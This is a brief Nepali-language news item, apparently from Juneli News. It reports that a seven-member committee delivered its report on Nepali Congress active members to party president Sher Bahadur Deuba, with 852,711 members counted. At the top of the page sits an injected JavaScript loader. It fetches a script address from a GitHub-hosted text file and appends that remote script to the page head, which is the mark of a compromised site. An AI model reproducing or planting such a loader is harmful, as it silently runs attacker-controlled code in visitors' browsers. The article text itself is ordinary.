;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
१२ साउन , जुनेली न्युज | नेपाली काँग्रेसको १४ औ महाधिबेशनको लागि भरिएको क्रियाशील सदस्यको प्रतिबेदन पार्टी सभापति शेर बहादुर देउवालाई छानबिन समितिले बुझाएको छ |
आज मंगलबार रमेश लेखक सहितको ७ सदस्यीय समितिले झन्डै डेढ महिना लगएर सदस्य छानबिन गरि बुझाएको हो |
नेपालि काँग्रेसको क्रियाशील सदस्यको संख्या ८ लाख ५२ हजार ७११ पगेको छ |
फेसबुक प्रतिक्रियाहरु